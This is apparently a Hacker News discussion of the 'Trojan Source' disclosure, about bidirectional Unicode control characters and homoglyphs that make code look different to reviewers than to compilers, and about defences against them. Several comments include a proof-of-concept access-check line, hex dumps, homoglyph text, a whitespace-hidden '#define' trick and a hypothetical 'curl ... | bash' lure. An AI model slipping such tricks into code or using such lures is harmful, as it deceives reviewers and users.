‘Trojan Source’ Bug Threatens the Security of All Code
krebsonsecurity.com
krebsonsecurity.com
The homoglyph attack is interesting but it really should be noticed as part of a code review process, as it requires adding the imitation function calls at some point too. It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.
It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however :D (we do always highlight the bidi characters on GitLab snippets, though)
Aside: this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly". I ended up checking the files in Windows Notepad on another machine to sanity check them.
Thanks to the authors for responsible disclosure.
That actually strikes me as very desirable. (Especially in light of the old maxim that "programs must be written for people to read, and only incidentally for machines to execute".)
And, actually, there was some really really cursed Soviet encoding that did this to save bits. The Russian railway company still uses it[1] to this day.
I know at least 10 stories that start like this
Well, as a moderately old Czech, I'm somewhat familiar with Cyrillic. They kind of used to force it on us in schools.
Have you tried something similar to what the browsers do where highlighting is only enabled when there are multiple scripts mixed within the same token? Source code seems like it would be harder since you have many tokens rather than just a single one as in a hostname, and I'd be curious how much legitimate usage mixes scripts for technical reasons because you have something like a language or framework convention that certain names start with a particular English-derived term.
For someone with more gumption than me:
Future copy & paste will default have intermediate screenshot and OCR steps. Voila: charset scrubbing for free.
Why not? Already today misc UIs and renderings disallow text selection. Drives me nuts.
To clarify, by default copy and paste works the normal way, but you can open the app switcher to use the OCR copy/paste which works on non-selectable text too, even in images.
I gotta say that I always make sure that I understand each piece of code that I copy paste but I do copy paste and never thought of this type of attack. Maybe that's something I should pay attention to in the future.
I've never seen it used for Japanese. I don't think there is a valid use case for Japanese.
Hebrew would be a more valid second example I think. I'd be curious to know how many languages maintain their RTL preference online.
⸻⸻⸻
1. All of this also applies to Chinese and Korean. Interestingly, traditional Mongolian script is also written vertically, but in columns left to right rather than right to left.
Which, if one is suspicious of code, can be defeated in vim with: set encoding=latin1
this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly"
That's because vim supports Farsi/Arabic natively from day one. Even if the OS does not support it, you can still write bidirectional and right-to-left text in vim. Never knew the reason, but thanks Bram Molenaar.I was expecting a big fat warning on the merge request itself, or maybe on the lines containing the dangerous chars.
In the end, it is a small ? character inserted were the unicode control chars are, and a mouseover tooltip warning about a potential issue.
The warning is good, but why so subtle? Sorry for the criticism. The feature is still a huge positive.
GitHub by comparison went down the alert banner route, from what I can see. I'm not opposed to adding something to that effect as well though - especially for inexperienced reviewers, it would be nice to include some more information about the potential exploit. That could be something we revisit when we add the homoglyph highlighting.
And here's what it looks like in various conditions/viewers:
With the fix, this is how it looks in the browser in the Gitlab interface:
if (accessLevel != "user�") {� // Check if admin ��
Without the fix, viewed raw (and thus viewed in a vulnerable way), it looks like this: if (accessLevel != "user") { // Check if admin
And in a hex viewer, it looks like this: 000005b0: 2020 2020 2020 2069 6620 2861 6363 6573 if (acces
000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2 sLevel != "user.
000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069 .. ...// Check i
000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229 f admin... ...")
000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020 {.
00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f console.log("Yo
00000610: 7520 6172 6520 616e 2061 646d 696e 2e22 u are an admin." var accessLevel = "user";
if (accessLevel != "user� �// Check if admin� �") {
console.log("You are an admin.");
}
than this: var accessLevel = "user";
if (accessLevel != "user�") {� // Check if admin��
console.log("You are an admin.");
}Interesting paper. Note, however, that the general problem is already known and there are a number of pre-existing works that discuss it. This is typically called "underhanded code" or sometimes "maliciously misleading code". I'm surprised that they didn't use the normal term for the problem nor cite the previous work on it - maybe they didn't realize this was a widely-known problem? Previous works on underhanded code didn't discuss Bidi to my knowledge (though other attacks on text like this have exploited Bidi). Here are a number of other materials about underhanded code:
The Obfuscated V Contest (http://graphics.stanford.edu/~danielh/vote/vote.html) was created by Daniel Horn in 2004 and is the earliest “underhanded” programming contest that I found. It was a contest to create source code that looked like it did one thing, but actually did another.
Underhanded C Contest (http://www.underhanded-c.org/) has run in many years. Per its FAQ, "The Underhanded C Contest is an annual contest to write innocent-looking C code implementing malicious behavior."
My PhD dissertation "Fully Countering Trusting Trust through Diverse Double-Compiling" discusses how to counter the "trusting trust" problem & includes a section about maliciously misleading source code. See: https://dwheeler.com/trusting-trust/
The JavaScript Misdirection Contest announced the winner on September 27, 2015 http://misdirect.ion.land/
My paper "Initial Analysis of Underhanded Source Code", (by David A. Wheeler, April, 2020, IDA document: D-13166), discusses underhanded code and the effectiveness of several potential countermeasures. It also includes a number of citations to other works on underhanded code. https://www.ida.org/research-and-publications/publications/a...
Both of these were fixed in Solidity shortly after the bug reports.
(P.S. I'm a member of the Solidity team)
If however, you used the "bugdoor" method, you can plausibly deny any malicious intent and you will absolutely get away with it.
/* Legitimate comment. <a lot of white space to go off screen> */ #define malicious code
Nobody will notice the horizontal scroll bar.Unless I misunderstand the premise, this in not right. The compiler is not "tricked" into doing anything different - it interprets the code the same way as it always did. It's like saying "rm" command "can be tricked into" deleting important files. The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code. It would correctly compile any code that is syntactically correct - if there are strings inside that look weird to you, it doesn't matter to the compiler.
The entity that can be "tricked" here is the reviewer of the code - who, indeed, might probably be tricked into accepting code that does something different than they'd think it does (though it'd require a very clever attacker to for the code to both do something nefarious with Unicode and still look innocent and not weird to the reviewer). Fortunately, this is quite easy to fix - just don't accept any patches with source code that have any non-ASCII outside small set of localization resources (proper code would have localizable resources outside the code anyway, tbh) and no Unicode would ever trick you.
There are plenty of projects out there written by people who aren't English speakers who depend on the Unicode capabilities of languages to write code that is actually readable to them. Turning that off is far from a solution.
I myself am not native English speaker and use unicode when writing in my mother tongue, but in 20+ years of programming I've never seen anyone using non-ascii chars in their professionally written code? Of course, you use the language in localization files, and perhaps in comments occasionally - especially in TODO stuff that's not meant to be permanent - but not in the actual code, like e.g. for a variable or function names.
I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.
How would you name a FooBarWicket if you don't speak a word of English?
I mean don't get me wrong, ideally everybody writes code in perfect English and sticks to a set of ~50 ascii characters, but it's not an ideal world and you have to keep other languages and cultures in mind.
Not sure how would you write a comment in an RTL human language in the middle of LTR code without it. Lots of people write learn RTL languages well before writing any code.
What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.
Now, bidi overrides in identifier names is a nightmare I’d prefer to avoid.
You only need it if you are doing this, and the default Unicode algorithm for guessing LTR/RTL boundaries gets it wrong, so you need to override with an explicit bidi override control. I'm not even sure how feasible that is to do in current editor/IDE environments developers who have this use case might use.
I am genuinely curious how often these sorts of situations come up in actual development.
> What compilers can do is to process those characters and assign them semantic value that makes the code equivalent to what is expected to be rendered.
I don't understand what you mean or how that's even possible, for the kinds of attacks discussed in OP.
Unicode can handle this, it has a heuristic algorithm for it. Note how if you try to select the text character-by-character, your selection does funny things at the rtl to ltr boundaries, because the byte order doesn't match the order on the screen. It really is handling the directionality changes, with the letters entered in "order" across changes, there is no funny entry or ordering going on, this is plain old normal unicode handling interspersed directionality changes just fine, with no bidi overrides.
It just sometimes gets it wrong for the intent of the author. Especially when there are characters at the boundaries that are themselves not strongly associated as rtl or ltr (like ordinary "western arabic numerals" or punctuation). That's what the bidi override control char is for.
Siht ekil.
It's not even remotely well-defined, and probably never will be. Also, as long as we keep adding to unicode, you will need to keep your whitelist of code points updated.
You can however find a well-defined subset of characters that can be allowed.
In either case you'd be essentially excluding entire languages.
>> There is only ... that should ever be allowed...
What I am saying is someone decides to code in a non-english language (which is completely reasonable) they should define a subset of unicode characters that is acceptable. Additionally, the allowed characters should not permit tricks like these.
As for excluding entire languages... well, yes. This is already the case today. But OTOH it's not like understanding what "if" means gives you any special advantage in programming.
The libraries of most programming languages (developed in the west) are in ASCII - frameworks and middleware too. Have people in countries like Japan and China actually translated all of that code - renaming functions, classes, and variable names to their native tongue in Unicode - or do they just learn the English names (they are all nouns/pronouns and at most simple phrases so translation should not be too difficult; they don’t have to understand English grammar).
China is huge so I can see how it could work for them, but I still have to admit it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time. It's not anything new as a concept, nor I see it as damaging for local cultures in any way - back in my University days I've learned myself some Russian so that I could read their physics and chemistry books which were excellent and way cheaper and easier for me to get than those from the West. One day I'll have no problem learning some Chinese if (or more likely when?) they become the referent source of knowledge.
Having worked with some large software teams in China my experience was that most people could speak a bit of English (but generally didn't want to) and were nowhere near at the level needed to actually design and write software in English.
If we forced them to do everything in English quality was terrible and everything took ages, but it we let them write in Mandarin things were much better.
Why would they need to learn English to do those things? I'm sure there are Chinese-language tech news sites, and Chinese-language documentation.
We’ll get there eventually with software, but it generally doesn’t kill people so there’s less incentive.
How would you learn how to make a FooBarWicket without knowing a word of English? Any programming languages control constructs are almost by definition English.
(I have used a bidi override before myself, for non-malicious purposes!)
The examples [0] posted in this thread have the bidi characters inside a string literal.
[0] https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...
If so, that is devious!
It's not clear to me if those example show that though. They show bidi characters being highlighted in a string literal, right.
My hypothesis was that such could not be part of a "trojan source" attack... but this stuff is confusing and I could have it wrong?
Proper quotes, proper dashes (ASCII doesn't have a dash character, it only has minus), non-breakable space, soft hyphen, € character, Greek letters like π and μ, etc.
Another thing, not every software needs i18n. Depends on the market. I'm yet to see a C++ compiler which would localize their output messages.
Intel C++ compiler seems to have a Japanese version (not tried).
Would you accept teaching code as production code? Specifically, if you were to teach programming to young non English speakers, wouldn't you accept them to use words of their native tongue for variables and such?
> I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.
Wouldn't you say that solely using roman letters in code would impose a similar limit? In countries where these letters are seldom used (like for instance greek letters in western countries), only those accustomed to them would be able to handle code (as it has been the case until the last decade perhaps).
This is actually no longer true. Many rm implementations today prevent you from deleting a path including the root directory, unless you explicitly specify `--no-preserve-root`. Similarly, a lot of compilers tend to warn you or outright stop if they detect code that is very likely to be buggy - the rust compiler warning about these control characters is just the latest example.
Of course, in theory, each tool should do its job and the user should be the boundary to know whats right. In practice, though, these heuristics tend to catch bugs-to-be 95% of the time (at least in my experience) and are easily disabled otherwise, so they are good to have.
The `--one-file-system` or `--preserve-root=all` flags are more useful than `--preserve-root`, but they're not defaults. (For a good reason: compatibility.)
Rust 1.56.1 will be released later today.
> To assess the security of the ecosystem we analyzed all crate versions ever published on crates.io (as of 2021-10-17), and only 5 crates have the affected codepoints in their source code, with none of the occurrences being malicious.
Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png
if access_level != "user" { // Check if admin
opens up a whole can of worms though. You don't need cunning invisible control codes to break that line, you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit. Even better, this would be a completely deniable attack ("oops, I must have accidentally pressed alt-R while typing that letter" excuse) - whereas explaining away why you checked in some magical RTL/LTR encodings and hacked up a comment is impossible. Plus, it would render well in far more apps, terminals, command line programs, etc etcif (uid = NULL) { // Check if root
And if you’re using clang: if ((uid = NULL)) { // Check if root
I'd venture that this is far more dangerous than unicode in strings...
or how about:
strcpy()
or #include anything with a #DEFINE
That's not the same class of error, since here a programmer can see the issue by simple inspection.
> or #include anything with a #DEFINE
This one perhaps is closer to the mark, although not based on unicode.
I dealt with a bug that only appeared in release builds, and never in debug. The offending code looked roughly like this:
if (blah)
#ifdef DEBUG
baz();
#endif
bar();
The systemic problem was it was a project created by interns, and they'd review each others code. By the time the bug got to me the interns had left and a Sr Dev had spent a day looking for the bug. It took me an hour to find it. In isolation its easy to see but in the mess of all the other code, you really have to look for these things.In the situation you described:
* you have a fairly easy way to detect the problem
* the interns still have plausible deniability as to whether they intended to leave a defect or not
The discussed problem with unicode is clearly meant to be used as an exploit, its likelihood of occurring by accident seems very close to zero.
https://locka99.gitbooks.io/a-guide-to-porting-c-to-rust/con...
As long as you're initializing a variable, it's allowed, if you're not initializing you'll have to use a block expression.
"Rust does not allow assignment within simple expressions so they will fail to compile. This is done to prevent subtle errors with = being used instead of ==."
Better?
The post mentions that exploit (and Rust's already existing defense) in the appendix.
Here are the details, as explained in a previous post:
> The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.
warning: identifier pair considered confusable between `s` and `s`
https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html if access_level != "user" { // Check if admin
if access_level != "user" { // Check if admin
Come on, that looks obviously off.... And that point is that none of the vowels in my previous sentence are latin, I guess.
$ xxd
I thіnk thаt іt іs possіblе thаt you аre missing а fаіrly important point.
00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1 I th..nk th..t .
00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0 .t ..s poss..bl.
00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265 . th..t you ..re
00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1 missing .. f...
00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070 .rly important p
00000050: 6f69 6e74 2e0a oint..I also skipped a bunch of the "I"s.
a: U+0430 "Cyrillic small letter a"
e: U+0435 "Cyrillic small letter e"
i: U+0456 "Cyrillic small letter Byelorussian-Ukranian i"
But it's their example. The problem isn't with homoglyphs, though. It's with bidi control characters, which are invisible to a human but not to the compiler, which is how generated code can end up semantically different from source code, which is the actual problem here. What you see in code review would be the first line, even though that isn't actually what is in the source, because an editor that is bidi-aware would show it that way.
It's the example that the researchers provided to us, to be clear about it.
Sure.. in the original HN submission. I was referring to Rust's built-in homoglyph detection though, which is what the parent comment (and its parent) was about.
Unfortunately, I've little experience of rust, so I don't have experience of that warning. It would certainly help catch a one-liner exploit, but wouldn't it be excessively noisy for code written in non-english languages?
But if you want to, turning off specific warnings for a file or block of code is really simple in rust, just add "#[allow(confusable_idents)]"
Note that the lint you mention is about identifiers, while "user" is a literal. The lint does not fire for literals. String literals have always supported non ascii characters since 1.0.0, and there has never been a lint for them, until now with the 1.56.1 release.
What I'm interested to know is whether there is any code already out there in the wild with this exploit in it? An intelligence service could have exploited this years ago without anyone noticing until now.
Unicode is a pathway to all manner of hijinks, including as you say, homoglyph attacks. For instance, on some TLDs I can easily create two different domain names that render identically in the browser.
It's possible, but I doubt it. The paper mentions that Vim isn't vulnerable to the bidirectional attack. Not mentioned in the paper: neither is `less`, the pager, which is used by default for `git diff` and other Git commands. Nor are either of the first two terminals I tried, when `cat`ing the file without a pager.
All of the aforementioned programs display the direction markers as either escape sequences highlighted in bright colors, or garbage characters, both of which stand out visually like a sore thumb. Now, that's more a sign of poor Unicode support in those programs than it is anything to their credit. But it does mean that this kind of attack is incredibly brittle, at least in any codebase where some people working on it are likely to be using Unix tools. There's a high chance the aberrant characters will be spotted at some point or other.
And once spotted, it's self-evident that it's an attack. I suspect real attacks would try to be more subtle, introducing bugs that could pass as genuine mistakes, at least at first glance.
They've also often shown non-printable ASCII control characters for basically forever. Null bytes and \bel and whatnot are very important despite being "invisible", and they've been around for decades.
Since that, I pretty much always run some variant of the gremlins plugin, which highlights pretty much all unicode spaces, dashes and other weird control symbols.
Because the editor is supposed to edit plain text, which means all characters must be editable. And something can only be editable if they are visible.
But that behavior is intentional. If you want, you could do "alias less='less -r'", and then it would behave the way you want, and you'd become vulnerable to this attack.
> Warning: when the -r option is used, less cannot keep track of the actual appearance of the screen (since this depends on how the screen responds to each type of control character).
This is not the same as actually supporting (i.e. being able to keep track of the screen state for) bidirectional text that may legitimately use those characters.
For that matter, the terminal may not support it either, as I mentioned.
Though, today I learned there has been some effort in recent years to improve bidirectional text handling in terminals and terminal applications, generally:
https://www.reddit.com/r/linux/comments/dn8uka/bidirectional...
That or just ignorance. Krebs has zero training or education in computer science or programming.
You can't (any more)¹. That worked for a limited amount of time, then mitigations were put in place, and subsequently standardised as part of Unicode. Everyone who deals with implementations of Unicode is supposed to be knowledgeable about the security relevant aspects, you can bet that the people working on browsers definitely are. <http://p3rl.org/perlre#Script-Runs>
¹ invitation to prove me wrong, I am on purpose leaning far out the metaphoric window and will gladly eat my words
If you pay the maker of the that browser they'll inject any links you want on most pages on the internet. Just give them the hash of the email / phone number of your target. It helps both economically and passing their security checks if you have more than a thousand victims you want to target.
If you want to fool a developer just host it on a github page. If you want to fool anyone else, just do a decent clone of their page.
If you want it to appear on most major news network sites, just pay $150 for a newswire.
Think about it, if you crafted the right article, maybe about a fork of homebrew etc, and redirected to a github page with a link stating you needed to copy and paste
curl http://github.com/asdkfjas/homebrew.sh | bash
into their terminals how many would do it?
>In most places a single word would never be written in multiple scripts, unless it is a spoofing attack. An infamous example, is
>>paypal.com
>Those letters could all be Latin (as in the example just above), or they could be all Cyrillic (except for the dot), or they could be a mixture of the two. In the case of an internet address the .com would be in Latin, And any Cyrillic ones would cause it to be a mixture, not a script run.
That was my understanding too, until this last week when I figured out you could.
I'm pretty certain this: and this: are the same rendering, but are different Unicode, and I can register them both as domain names under some TLDs. Google displays them the same in their result pages too.
> perl -C -E'print "\N{U+74}\N{U+68}\N{U+69}\N{U+73}\N{U+3A}"' | hex
0000 74 68 69 73 3a this:
HN software likely ate the relevant details you wanted to show, can you please try again and use a notation that survives the HN filter?When I created the file in Notepad it showed the hidden code, but I can register both those as valid domains and Google will show them identically in the SERPs, and Safari will show them both identically in the address bar. Chrome/Edge expands them in the address bar, but will render them the same in HTML. Have not tested on Firefox.
If you View Source in Chrome it won't show the hidden code, but if you open the dev tools it will start to break.
In general a multilayer solution is needed: compilers, linters, Unicode standard, merge tools, editors, and so on.
Could you elaborate? rustc ships with the entire Unicode db and only allows indents with codepoints advertised by Unicode as allowed in indents.
The closest to walking off the beaten path is a (still unmerged) parser recovery PR that accepts emojis as identifiers if and only if a parse error would otherwise occur as a way to avoid knock down errors when someone tries to use them.
That's about 2k vs 20m.
There is a draft standard for this.[1] It references RFC 5893 and some other documents. Some of the rules:
- All code points in a single label must be taken from the same script as determined by the Unicode Standard Annex #24: Script Names. Exceptions to this guideline are permissible for languages with established orthographies and conventions that require the commingled use of multiple scripts. (Like mixing kanji and romaji in Japanese.)
- The "Bidi rules" of RFC 5893, which define allowed right to left and left to right modes, must be enforced. These are complicated, because of such things as the Arabic and Hebrew convention of right to left text with left to right numeric digits in numbers. But they are well-defined.
- Only code points allowed by IDNA 2008 are allowed. This eliminates such things as the non-breaking zero width space, the expansion areas for future use, and such.
The domain name people have been banging on this problem since 2003, and by now, there's a rough consensus of what to disallow. So start putting checks for that in compilers. If you find violations of those rules, it's more likely to be a typo than something useful, anyway.
So that's a way out of this.
[1] https://www.icann.org/en/system/files/files/draft-idn-guidel...
But this attack works by placing characters inside comments and srings. So these checks would not help preventing this particular attack.
No I think some people would disagree, arabic coders for example. People just need to be aware of this when using unicode in their product.
Compiler maintainers need to update the syntax rules to restrict free mixing of unicode characters. Similar restrictions were already adopted in domain names.
I'm very, very sorry CmdrTaco.
And while they have valid use cases, I can't see it in e.g. comment sections or chat messages. Happy to have someone link to e.g. a Vietnamese comment section showing practical use though.
My bad, definitely sorry. A case of your favourite bubbly pop on me.
Then build/commit/test hooks could be used to enforce that source code files are indeed 100% ASCII.
I know, I know... Some are going to lament they don't have their shiny Unicode symbols right in their source file. But... It looks like you get what you pay for.
Bruce Schneier wrote it when Unicode came out btw: "Unicode is too complex to ever be secure".
It's astounding to me that there's room for such complexity in it. I thought it was just a lot of symbols. What other rules does Unicode have besides changing the order sometimes?
I'll leave it up to others to discuss how important this is or isn't.
Seems to me that if you need to put code in the comments, you've got a bigger problem. I know people like tab hints and lint overrides, but maybe it is time to focus on separation of concerns at a higher level?
No, because the exploit line doesn't contain a comment. It just looks like it does.
It might not be ideal for you, but you can always use escape codes in your string literals so it is at least possible to avoid all non-ascii characters in your code.
https://github.com/nickboucher/trojan-source/blob/main/JavaS...
Seams like a layer 8 problem?
Snark aside, most text based editors have some giveaway or another. Even the GUI ones show syntax highlighting quirks that show that something is wrong.
This is only really relevant in unicode-aware terminals, without syntax highlighting and when you don't get to scroll between characters. IOW, it's really quite hard to do.
IOCCC entries will absolutely become more fun though.
IOCCC doesn't allow unescaped octets with high bit set [1], so even that's no go.
[1] https://www.ioccc.org/2020/rules.txt (rule 13)
[1] https://www.ioccc.org/2000/briddlebane.c vs. https://www.ioccc.org/2000/briddlebane.orig.c
But I agree the trick (hard to call it an attack or even bug) is fun, in the same way as the earlier tricks of fake filename extensions. And terribly obvious, even with the limitations of default code viewers, and with no plausible deniability once caught, so it's pretty overblown for practical considerations. The intentionally introduced Linux kernel bugs from several months ago were far more significant a lesson for people to learn from, and they didn't rely on any unicode tricks but on much simpler tricks that were also somewhat plausibly deniable to chalk up to an oopsie.
Most of what I've encountered though has been due to a lack of unicode support, and related growing pains in adopting full UTF-8. E.g. much of the Eclipse issues I saw were due to UTF-16 weirdness and stuff encoded in ShiftJIS or whatever flavor of Windows encoding you used, and all those garbled files due to missing magic-encoding-bytes in files. UTF-8 support "completing" in tools largely cleaned all that up, since they detected the encoding, converted to UTF-8, and showed abnormal stuff as the abnormalities they were all along.
I mean, that's probably because taking a deep look at supporting UTF-8 meant taking a deep look at many of their latent text bugs and finally fixing them, but it still happened around the same time, and "X editor now supports UTF-8" also marked a dramatic increase in "... and now shows <nbsp> explicitly!" and similar things.
Source code combines multiple kinds of text. There are
* hierarchical structure,
* mathematical and logical syntax
* literals (especially insidious: text)
* free text in comments and
* markup in documentation
These newly discovered vulnerabilities remind me of the issue of SQL injection, which is also caused by a confusion when combining these kinds of text.
For SQL injection, the solution was to introduce facilities to explicitly combine SQL syntax and dynamic literals. Maybe we need something similar for code that enforces such strict separation. Maybe into different files or nested into a container format. There are already facilities for doing so (resource files, templating languages) but they are opt-in and don't go far enough to address the newly discovered problems.
The cost would be that code could become more difficult to edit with plain-text editors.
for c in 'عودة أبو تايه':
print(unicodedata.name(c))
On the other hand if you want to romanize that string as EWDTA AEBW TAIH then all you need is a for loop and a switch statement, because the memory order is always left to right. We can also rest assured that if someone invents a better display algorithm, we won't need to do any database migrations, since the encoding itself doesn't need to change.And keep in mind that if you store RTL text backwards, as you propose, every algorithm now has to be able to process backwards text. Backwards spellcheck is a lot of extra work...
You could absolutely design a new string container that assumes left to right at all times and cannot be changed, but then it's on the programmer to ensure that strings are copied or concatenated in the right direction, at the right location, and substrings searching becomes a minor headache. How would you concatenate an RTL string to a forced LTR string representation? You would have to work out whether the end of the string it LTR or RTL. If LTR, append directly. If RTL find the character where the direction changes and insert the string in there - much more expensive. Better to just append the string, using bidi codes where required, and let the frontend process the string to make the appropriate direction changes. Yes, you may need to search the string for the bidi code to know which direction you're going at the end of the string, but that's just a simple reverse string search for a single control character, and not a complex variable multi-byte search of inferred character directions by codepoint values.
I think the issue is in the locations of which bidi codes are rendered. They provide an inherent untrustworthy-ness to the text area they're rendered in, and so should be treated as an exception in critical situations. I've seen the reversed exe file name trick used for years, and every time I ask myself why that's even a thing? If the OS used file headers and magic numbers to determine file types instead of the filename, it would be less of an issue.
For source code, I would question the rendering of RTL text in a source code editor as it's an obvious issue for code safety. Ideally, all source code would be kept to the same origin language - doesn't have to be english, just consistent. Any non-conforming text should ideally be loaded from a resource rather than inline within the source code, to avoid foreign character contamination and allow easier identification of these issues. Further, source code rendering should only render identified safe control codes, and treat unsafe ones as raw binary values to be shown as such - i.e. \r and \n are safe, \b is unsafe, and bidi codes would also be unsafe. You could even go so far as to include them in the syntax highlighting, but that results in a dependency on syntax highlighting to show the semantics of the source code rather than the text alone.
The only reason why text was justifiable as a storage and manipulation format for code in the first place was because early computers (probably?) couldn't handle a tree format. That excuse has been invalid for several decades now, as is the idea that "everything is plain text". Code isn't plain text - if it was, then you could make arbitrary edits without syntax errors, but you can't, because code has structure. Start treating it that way.
For representing code as more than text, you will lose so much tools that can handle your code, it's a massive set back. Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.
Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.
That's a bug. Programming is hard, and you want the best, most powerful tools to handle it as you can - which means putting effort into making specialized tools instead of using generic ones like text editors.
> For representing code as more than text, you will lose so much tools that can handle your code, it's a massive set back.
No tools existed without first being built, so this isn't special. Rust didn't have any tools before people started building tools for it, for instance.
Moreover, the tools that we have now that are text-specific are pathetic. You can view the first n lines of a file? Wow, very impressive /s. More complex things like grep are just as realizable in a structure editor, and in order to use them for non-trivial stuff, you'd have to write structural regular expressions and implement mini-parsers anyway - things you would get for free if you just kept code as structure.
> Add to that how much effort it takes to get people onboarded on your new representation, and things look bleak for adoption.
You're misreading my argument. I'm not saying that people will adopt structured code (a descriptive statement), I'm saying that people should adopt structure code (a normative statement) because it'll be much better for them.
Also, you're making the assumption that onboarding is hard, and that compatibility layers can't exist - neither of which are true.
> Finally, programmers really like looking under the hood. And with plain text, you know exactly what your code looks like in bytes.
The average programmer probably looks at their code with a hex editor once in their life - this isn't really a good argument. Moreover, the vast majority of programmers already tolerate not looking under the hood in dozens of different ways - most use VM's like CPython/JVM/JS VMs, opaque frameworks like React/Angular, graphics APIs like OpenGL/DirectX/Vulkan, complicated editors like Visual Studio Code/Emacs, and far more without ever looking under the hood of any of those - so there's no reason to not add another layer (especially because you can build that layer to be easy to peer through) for the sake of productivity.
http://www.lispworks.com/documentation/HyperSpec/Body/02_dhp...
The example shows this with some made–up data, but you can use it with arbitrary code as well. It is very easy to use it to create circular lists, which when executed are infinite loops.
Naturally the only sane thing to do is to keep your code strictly a tree.
We probably just need a git switch which would make it throw an error if it encounters Bidi or any weirdness like that except in resource files.
Identifiers and comments are a serious problem though. Many application domains use terms that are tricky to translate into english. The translations could be misleading, inappropriate or not unique. Sometimes they are just plain wrong or there is no english word that fits. All of these could cause misconceptions, confusion and bugs, and make reading and working with the code and the running system harder.
What if instead of translating those terms to English, you just transliterated them to the Latin alphabet?
For Chinese and Japanese, using a romanization is not really an option. Most romanization systems are intended for academic study, as pronunciation aids and for input methods. Most varieties of Chinese have a huge number of homophones, and the romanization of such texts can be difficult to read unambiguously.
[0]: https://en.m.wikipedia.org/wiki/Vietnamese_Quoted-Readable
In my own work, I use almost no dependencies (aside from compilers and built-in APIs). Scratch that. I use a lot of dependencies, but ones that I have written, and generally rewrite snippets, when I use them.
Also, very little of the code I see, has comments.
Like, any comments; even headerdoc comments.
> Green said the good news is that the researchers conducted a widespread vulnerability scan, but were unable to find evidence that anyone was exploiting this. Yet.
… “yet” …
I know that I’m a “dependency curmudgeon,” but stuff like this just serves to reinforce my posture.
Like oh, hey, we need a database, great, lets roll our own. Or the ancient version of whatever lib shipped with the OS that is full of bugs solved in subsequent versions.
I see that you now use a lot of dependencies, and retract my statement.
I can see the kitchen from the lunch counter, and I’m a damn good cook, myself.
I won’t tell anyone else what to do (unless I’m paying them), but I refuse to add code to my projects that I don’t trust completely (which is, I know, not a guarantee, but it’s a pretty good bet).
I have to rely on the core libraries and development tools I use, but, if I have my druthers, I am picky as hell.
Seriously. Look at my stuff. You’ll see that I put my work where my mouth is.
Either have 100%, ironclad security, or "Who cares? YOLO! STDs be damned" abandon?
We do what we can to make sure what we write is as good as possible.
I lock my car door, when I get out. I know that it won't stop a determined thief, but it will avoid problems from the casual knucklehead.
Otherwise, if you own your own code, this obviously isn't an issue. (Unless, of couse, for some reason you want to program exploits into software at your organization :) )
Heck, even GitHub already shows a warning for files that have bi-directional unicode...
A bit of an overemotional title if you ask me.
Full Stack Chris reviews some code that he thinks says:
if access_level != "user" { // Check if admin
This may be an open source project. This may be an internal bad egg (a very common threat; insider jobs are actually one of the absolute top risks to a company). Or this code may be injected by an attacker who has gained access to the repo and is leaving backdoors that they hope to survive long after their access is blocked or leaving backdoors to make deployed production systems vulnerable. Etc.And Chris won't notice that the computer will execute:
if access_level != "user{U+202E} {U+2066}// Check if admin{U+2069} {U+2066}" {
This is not just an attack on compiled languages. Scripting languages are just as vulnerable.Isn’t the issue that they are using magic strings? If the strings were something like RoleConstants.Admin then this is avoided?
Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.
There is no comment string.
My mistake was thinking the initial Unicode character was changing the comparison string similar to a non printable character could. But instead it flips the ordering so that the comment is part of the comparison string and then the string is terminated.
The idea here is that you make part of the comment appear to be outside of it, and thus appear to be code that will be executed. You can reshuffle the text arbitrarily, so you can move text backwards to appear to be before the start of the comment, or forwards to appear to be after the end of the comment. If you really want to, you can treat the whole line as an anagram, and rearrange the individual letters into any order you like. This could enable really clever attacks where any use of an enum constant appears to be a use of a different one.
A bunch of hits found across the top ~2M open-source repositories: https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
To triage, you probably want to first look at hits in code files (not JSON or Markdown, etc.):
https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
You can set up a self-hosted instance of Sourcegraph to run this across all of your company's code: https://docs.sourcegraph.com/.
Some compilers, notably clang, will warn you that you're using an "invisible character". Assuming you at least read the warnings your code generates (because if you don't, why not just put exploitable algorithms deep down ontthe software?) you'd probably catch the issue.
Simpler programs such as the text editor that ships with GNOME will freak out, but I don't think most people are coding in that in the first place.
I think this is an interesting peculiarity, but it's not a "threat" to "the security of all code".
(setf (default-value 'bidi-display-reordering) nil)
The BIDI issue looks pretty bad in emacs-gtk: the sneaky text is unnoticeable in lots of modes, unless the cursor just happens to scroll over it.The capability to declare document character sets was dropped along with supporting an SGML declaration altogether.
That describes a concept, over several stages, where a compiler can be made to change the behavior of programs it compiles in a difficult-to-find way.
[0]: https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...
Does it work here?
> I am an toidi
No? HN strips the BDI.
